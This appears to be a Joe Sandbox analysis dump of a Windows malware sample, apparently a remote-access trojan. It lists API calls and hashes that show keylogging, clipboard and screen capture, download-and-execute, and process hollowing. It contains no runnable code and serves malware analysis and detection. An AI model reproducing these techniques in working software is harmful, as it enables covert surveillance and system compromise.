                                • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                                APIs
                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                                • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP
                                • API String ID: 2299586839-711371036
                                • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                                • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                                APIs
                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                • wsprintfW.USER32 ref: 0040A13F
                                  • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventLocalTimewsprintf
                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                • API String ID: 1497725170-248792730
                                • Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                                • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                                • Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                                • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                                APIs
                                • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                                • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                                • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                                • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: SETTINGS
                                • API String ID: 3473537107-594951305
                                • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                                • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                                APIs
                                • __EH_prolog.LIBCMT ref: 004087A5
                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstH_prologNext
                                • String ID:
                                • API String ID: 1157919129-0
                                • Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                                • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                                • Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                                • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                                • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                                • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                                • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                                • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                • String ID:
                                • API String ID: 745075371-0
                                • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                                • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                                APIs
                                • __EH_prolog.LIBCMT ref: 0040784D
                                • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                • String ID:
                                • API String ID: 1771804793-0
                                • Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                                • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                                • Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                                • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                                APIs
                                  • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                                • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                                  • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                                  • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                • String ID:
                                • API String ID: 1735047541-0
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: A%E$A%E
                                • API String ID: 0-137320553
                                APIs
                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                                  • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                                  • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
                                  • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateInfoParametersSystemValue
                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                • API String ID: 4127273184-3576401099
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
                                • _wcschr.LIBVCRUNTIME ref: 0044F02A
                                • _wcschr.LIBVCRUNTIME ref: 0044F038
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                • String ID:
                                • API String ID: 4212172061-0
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadExecuteFileShell
                                • String ID: open
                                • API String ID: 2825088817-2758837156
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorInfoLastLocale$_free$_abort
                                • String ID:
                                • API String ID: 2829624132-0
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 004399A4
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                                • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                APIs
                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$Context$AcquireRandomRelease
                                • String ID:
                                • API String ID: 1815803762-0
                                APIs
                                • OpenClipboard.USER32(00000000), ref: 0040A65D
                                • GetClipboardData.USER32(0000000D), ref: 0040A669
                                • CloseClipboard.USER32 ref: 0040A671
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseDataOpen
                                • String ID:
                                • API String ID: 2058664381-0
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                • API String ID: 2325560087-3916222277
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .
                                • API String ID: 0-248832578
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: GetLocaleInfoEx
                                • API String ID: 2299586839-2904428671
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$FirstNextsend
                                • String ID:
                                • API String ID: 4113138495-0
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$InfoLocale_abort
                                • String ID:
                                • API String ID: 1663032902-0
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$InfoLocale_abort_free
                                • String ID:
                                • API String ID: 2692324296-0
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                APIs
                                • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: NameUser
                                • String ID:
                                • API String ID: 2645101109-0
                                APIs
                                  • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                                • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                • String ID:
                                • API String ID: 1272433827-0
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                APIs
                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID:
                                • API String ID: 2299586839-0
                                • Opcode ID: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                                • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
                                • Opcode Fuzzy Hash: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                                • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                                • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                • Instruction Fuzzy Hash:
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                                • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                                • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                                • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                                • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                                • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                                • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                • ResumeThread.KERNEL32(?), ref: 00416773
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                                • GetCurrentProcess.KERNEL32(?), ref: 00416795
                                • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                                • GetLastError.KERNEL32 ref: 004167B8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Mw$ntdll
                                • API String ID: 4188446516-1701449367
                                • Opcode ID: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                                • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                                • Opcode Fuzzy Hash: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                                • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                                APIs
                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                                • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                                  • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                                • DeleteDC.GDI32(00000000), ref: 00416F32
                                • DeleteDC.GDI32(00000000), ref: 00416F35
                                • DeleteObject.GDI32(00000000), ref: 00416F38
                                • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                                • DeleteDC.GDI32(00000000), ref: 00416F6A
                                • DeleteDC.GDI32(00000000), ref: 00416F6D
